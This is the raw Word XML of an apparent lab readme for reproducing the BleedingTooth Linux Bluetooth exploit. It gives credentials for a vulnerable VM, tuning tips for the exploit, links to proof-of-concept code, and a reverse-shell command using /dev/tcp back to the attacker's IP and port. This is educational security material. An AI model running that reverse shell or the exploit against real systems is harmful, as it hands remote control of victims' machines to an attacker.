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5297A84" w:rsidP="15297A84" w:rsidRDefault="15297A84" w14:paraId="63307E4B" w14:textId="555F47B1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t>Ubuntu.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t>vdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t xml:space="preserve"> is a copy of the vulnerable virtual machine which we used for the </w:t>
      </w:r>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t>BleedingTooth</w:t>
      </w:r>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t xml:space="preserve"> exploit. VDI files are virtual disk image files that are intended to be used with Oracle VirtualBox. To boot using the vulnerable kernel, hold shift on startup, select advanced options, and select kernel version 5.4.0-48-generic. More setup information can be found in the exploitation guide. The username of this VM is smurf, and the password is “ubuntu”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="15297A84" w:rsidP="15297A84" w:rsidRDefault="15297A84" w14:paraId="77AA32BE" w14:textId="016B1D8C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t xml:space="preserve">It should be noted that at the time of creating the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t>BleedingTooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t xml:space="preserve"> exploitation guide, we had not successfully achieved remote code execution. To achieve the RCE, make sure that the attacking device is powerful enough to complete the exploit before the Bluetooth connection disconnects. We learned this the hard way as a Raspberry Pi was not powerful enough to perform the exploit. If the exploit is unreliable or is unsuccessful, try increasing the following variables in the exploit.c file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="15297A84" w:rsidP="15297A84" w:rsidRDefault="15297A84" w14:paraId="46A77F62" w14:textId="711692D8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="15297A84">
        <w:drawing>
          <wp:inline wp14:editId="1994E2A1" wp14:anchorId="55B08B91">
            <wp:extent cx="4572000" cy="676275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1476424980" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R9cc622c0f5ce4cbd">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="676275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="15297A84" w:rsidP="15297A84" w:rsidRDefault="15297A84" w14:paraId="7173BC3F" w14:textId="2484E12F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t xml:space="preserve">In our case, we settled on using 12 for each. </w:t>
      </w:r>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t xml:space="preserve">Our success rate varied, but it was less than the 80% success rate claimed on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t>BleedingTooth’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t>GitHub</w:t>
      </w:r>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t xml:space="preserve"> page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="15297A84" w:rsidP="15297A84" w:rsidRDefault="15297A84" w14:paraId="63561DF1" w14:textId="0765742F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t>When troubleshooting, keep in mind that the command to be run on the victim’s machine is “</w:t>
      </w:r>
      <w:r w:rsidRPr="15297A84" w:rsidR="15297A84">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>/bin/bash -c /bin/bash&lt;/dev/</w:t>
      </w:r>
      <w:r w:rsidRPr="15297A84" w:rsidR="15297A84">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="15297A84" w:rsidR="15297A84">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="15297A84" w:rsidR="15297A84">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Source_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="15297A84" w:rsidR="15297A84">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="15297A84" w:rsidR="15297A84">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Source_port</w:t>
      </w:r>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t xml:space="preserve">”. Before attempting the exploit, try running this command on the victim’s machine while the attacking machine is listening to verify that you can achieve a reverse shell. The victim device needs to be able to connect with the attacker over the network for the reverse shell to work. You may test this by pinging the attacker’s </w:t>
      </w:r>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t xml:space="preserve"> address on the victim’s device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="15297A84" w:rsidP="15297A84" w:rsidRDefault="15297A84" w14:paraId="2BB5B629" w14:textId="633E69AE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="15297A84" w:rsidP="15297A84" w:rsidRDefault="15297A84" w14:paraId="376C1D08" w14:textId="435AE76B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="15297A84" w:rsidR="15297A84">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>GitHub Links:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="15297A84" w:rsidP="15297A84" w:rsidRDefault="15297A84" w14:paraId="74461623" w14:textId="48DE1ECC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="15297A84" w:rsidR="15297A84">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">BleedingTooth: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="15297A84" w:rsidP="15297A84" w:rsidRDefault="15297A84" w14:paraId="4BBC745D" w14:textId="077E6133">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hyperlink r:id="R8d733fa22ffd4263">
        <w:r w:rsidRPr="15297A84" w:rsidR="15297A84">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
          </w:rPr>
          <w:t>https://github.com/google/security-research/tree/master/pocs/linux/bleedingtooth/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="15297A84">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="15297A84" w:rsidP="15297A84" w:rsidRDefault="15297A84" w14:paraId="08A9F9F0" w14:textId="17B93EA7">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hyperlink r:id="Rfc0550a1819e4b8f">
        <w:r w:rsidRPr="15297A84" w:rsidR="15297A84">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
          </w:rPr>
          <w:t>https://github.com/google/security-research/security/advisories/GHSA-h637-c88j-47wq</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="15297A84">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="15297A84" w:rsidP="15297A84" w:rsidRDefault="15297A84" w14:paraId="1824E269" w14:textId="1DC176CB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="15297A84" w:rsidR="15297A84">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">BleedingTooth Demo Video Webpage: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="15297A84" w:rsidP="15297A84" w:rsidRDefault="15297A84" w14:paraId="5E4AD4D1" w14:textId="3BD9C49E">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hyperlink r:id="R69b5d0e61c8144da">
        <w:r w:rsidRPr="15297A84" w:rsidR="15297A84">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://teamevilsmurf.github.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="15297A84" w:rsidP="15297A84" w:rsidRDefault="15297A84" w14:paraId="7933894E" w14:textId="265F7C5A">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hyperlink r:id="R7038054eae2c450d">
        <w:r w:rsidRPr="15297A84" w:rsidR="15297A84">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/teamevilsmurf/teamevilsmurf.github.io/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="15297A84">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="15297A84" w:rsidP="15297A84" w:rsidRDefault="15297A84" w14:paraId="061BABE3" w14:textId="0468C0F4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="15297A84" w:rsidR="15297A84">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Crackle: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="15297A84" w:rsidP="15297A84" w:rsidRDefault="15297A84" w14:paraId="184284F5" w14:textId="66B41B4C">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hyperlink r:id="R5d3da4cb23bb4859">
        <w:r w:rsidRPr="15297A84" w:rsidR="15297A84">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
          </w:rPr>
          <w:t>https://github.com/mikeryan/crackle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="15297A84">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>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uj8SmbSkjnXu" int2:id="pFlpxbCV">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="3vGyVGOt5nJ6Q2" int2:id="s1CWiuPM">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="18rVavm9NgHmeA" int2:id="ggkWyqJf">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="bON14xXXIK8rpo" int2:id="UFU3rRcV">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="Nkc1Oee7e/tfu0" int2:id="GVYzXEss">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="fO26jsZm1oPjYF" int2:id="lu1FJhd2">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="mr8QlaAqQsmggI" int2:id="pSUGzP82">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="QsFkjgBwRuB7zp" int2:id="E1Smg2a7">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C7D255"/>
    <w:rsid w:val="036C4E46"/>
    <w:rsid w:val="04245A1F"/>
    <w:rsid w:val="09FDA0D1"/>
    <w:rsid w:val="0A2F9681"/>
    <w:rsid w:val="1031A8F1"/>
    <w:rsid w:val="1031A8F1"/>
    <w:rsid w:val="15297A84"/>
    <w:rsid w:val="1C2D3F36"/>
    <w:rsid w:val="1D76021B"/>
    <w:rsid w:val="1DAB1EF9"/>
    <w:rsid w:val="24C73727"/>
    <w:rsid w:val="26A5D368"/>
    <w:rsid w:val="2713027C"/>
    <w:rsid w:val="2713027C"/>
    <w:rsid w:val="29FAF1AA"/>
    <w:rsid w:val="2B96C20B"/>
    <w:rsid w:val="2BF845EE"/>
    <w:rsid w:val="2CD2490C"/>
    <w:rsid w:val="2CD2490C"/>
    <w:rsid w:val="2D1514EC"/>
    <w:rsid w:val="2DE720E7"/>
    <w:rsid w:val="2F6500AA"/>
    <w:rsid w:val="338D3F1A"/>
    <w:rsid w:val="3793F77A"/>
    <w:rsid w:val="3A8B66AA"/>
    <w:rsid w:val="3FA5C416"/>
    <w:rsid w:val="462E62B1"/>
    <w:rsid w:val="462E62B1"/>
    <w:rsid w:val="47CA3312"/>
    <w:rsid w:val="4BB6624F"/>
    <w:rsid w:val="4BB6624F"/>
    <w:rsid w:val="4C8026B5"/>
    <w:rsid w:val="52F755BF"/>
    <w:rsid w:val="5399093E"/>
    <w:rsid w:val="549B3705"/>
    <w:rsid w:val="594AD498"/>
    <w:rsid w:val="5B06880D"/>
    <w:rsid w:val="5C5B6C25"/>
    <w:rsid w:val="5CA2586E"/>
    <w:rsid w:val="5E250072"/>
    <w:rsid w:val="5E5785E6"/>
    <w:rsid w:val="5F47EEDA"/>
    <w:rsid w:val="5F47EEDA"/>
    <w:rsid w:val="5FD5D8C7"/>
    <w:rsid w:val="60C7D255"/>
    <w:rsid w:val="60E3BF3B"/>
    <w:rsid w:val="654118A0"/>
    <w:rsid w:val="6C7CA3A8"/>
    <w:rsid w:val="6F2AC6C6"/>
    <w:rsid w:val="71D47D9B"/>
    <w:rsid w:val="71D47D9B"/>
    <w:rsid w:val="72626788"/>
    <w:rsid w:val="73704DFC"/>
    <w:rsid w:val="75BC1951"/>
    <w:rsid w:val="76A7EEBE"/>
    <w:rsid w:val="7875B4CF"/>
    <w:rsid w:val="7875B4CF"/>
    <w:rsid w:val="7A118530"/>
    <w:rsid w:val="7BAD5591"/>
    <w:rsid w:val="7BF02171"/>
    <w:rsid w:val="7BF02171"/>
    <w:rsid w:val="7E5DFDCD"/>
    <w:rsid w:val="7E5DFDCD"/>
    <w:rsid w:val="7FF1E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D255"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{50C83918-A46B-4436-A1F1-9BD3034A07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cc622c0f5ce4cbd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/google/security-research/tree/master/pocs/linux/bleedingtooth/" TargetMode="External" Id="R8d733fa22ffd4263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/google/security-research/security/advisories/GHSA-h637-c88j-47wq" TargetMode="External" Id="Rfc0550a1819e4b8f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://teamevilsmurf.github.io/" TargetMode="External" Id="R69b5d0e61c8144da" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/teamevilsmurf/teamevilsmurf.github.io/" TargetMode="External" Id="R7038054eae2c450d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mikeryan/crackle" TargetMode="External" Id="R5d3da4cb23bb4859" /><Relationship Type="http://schemas.microsoft.com/office/2020/10/relationships/intelligence" Target="intelligence2.xml" Id="R59c4339acad1492d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="Rd8be1009e7c74b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2022-04-26T18:01:03.6690656Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-26T20:17:26.9568075Z</dcterms:modified>
  <dc:creator>Jack W Raymond</dc:creator>
  <lastModifiedBy>Jack W Raymond</lastModifiedBy>
</coreProperties>
</file>